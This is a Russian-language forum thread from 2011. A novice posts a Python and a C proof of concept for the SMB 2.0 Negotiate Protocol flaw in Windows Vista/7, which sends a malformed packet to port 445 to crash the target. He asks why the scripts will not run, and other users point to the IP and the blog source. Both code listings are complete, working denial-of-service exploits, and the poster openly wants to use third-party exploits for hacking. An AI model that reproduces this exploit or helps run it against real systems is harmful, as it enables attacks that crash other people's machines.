работа с *.py эксплоитами
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
работа с *.py эксплоитами - 2011-02-22 10:09:26.010000
|
|
|
red_fox
Сообщений: 5
Оценки: 0
Присоединился: 2009-01-26 20:54:09.263333
|
Добрый день ! Я новичок в плане взлома да и вобще ) Мне конечно очень понравилась программа Metasploit framework, но всех сплоитов которые там находятся, не совсем хватает, по этому я порылся в гугле и т.д. в итоге нашел сплоит для ОС windows 7 его содержание такое : from socket import socket host = "92.54.70.230", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: –> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close() я так понимаю он написан на python … пытаюсь запустить с консоли и вот что получаю : from: can't read /var/mail/socket host: couldn't get address for '92.54.70.230,': not found /home/blood/1st.py: строка 4: ошибка синтаксиса около неожиданной лексемы `(' /home/blood/1st.py: строка 4: `buff = (' ладно … дальше пробую запустить сначала python и потом из него мой файл : Python 2.6.6 (r266:84292, Sep 15 2010, 15:52:39) [GCC 4.4.5] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> '/home/blood/1st.py' >>> и ничего :( подскажете пожалуйста как мне быть?? что бы я мог использовать сторонние эксплоиты … Зарание благодарен…
|
|
|
RE: работа с *.py эксплоитами - 2011-02-24 10:38:39.336666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Ну так нет у вас доступа к 92.54.70.230
|
|
|
RE: работа с *.py эксплоитами - 2011-02-25 12:33:46.906666
|
|
|
red_fox
Сообщений: 5
Оценки: 0
Присоединился: 2009-01-26 20:54:09.263333
|
С этим все нормально и айпи пингуется и 445 открытый ( он внутренний ) , да я и на виртуальной машине пробовал - ничего ( Но как быть с этим ??? char buff[] = "\x00\x00\x00\x90" "\xff\x53\x4d\x42" "\x72\x00\x00\x00" "\x00\x18\x53\xc8" "\x00\x26" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x ff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x 45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x 20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x 30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x 20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x 31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x 02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x 20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x 32\x2e" "\x30\x30\x32\x00"; int main(int argc, char *argv[]) { if (argc < 2) { printf("Syntax: %s [ip address]\r\n", argv[0]); return -1; } WSADATA WSAdata; WSAStartup(MAKEWORD(2, 2), &WSAdata); SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); char *host = argv[1]; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = htons((unsigned short)445); ssin.sin_addr.s_addr = inet_addr(host); printf("Connecting to %s:445… ", host); if (connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) { printf("ERROR!\r\n"); return 0; } printf("OK\r\n"); printf("Sending malformed packet… "); if (send(sock, buff, sizeof(buff), 0) <= 0) { printf("ERROR!\r\n"); return 0; } printf("OK\r\n"); printf("Successfully sent packet!\r\nTarget should be crashed…\r\n"); closesocket(sock); WSACleanup(); return 1; } ведь я так понимаю функция "printf(" должна хоть что то выводить на экран, а там все та же картина —>>> >>> '/home/blood/1st.py' '/home/blood/1st.py' >>>
|
|
|
RE: работа с *.py эксплоитами - 2011-02-27 15:36:42.136666
|
|
|
fake_magent
Сообщений: 187
Оценки: 0
Присоединился: 2010-12-19 18:43:29.280000
|
то что выше это не питон речь идёт про http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.HТМL ?
|
|
|
|
|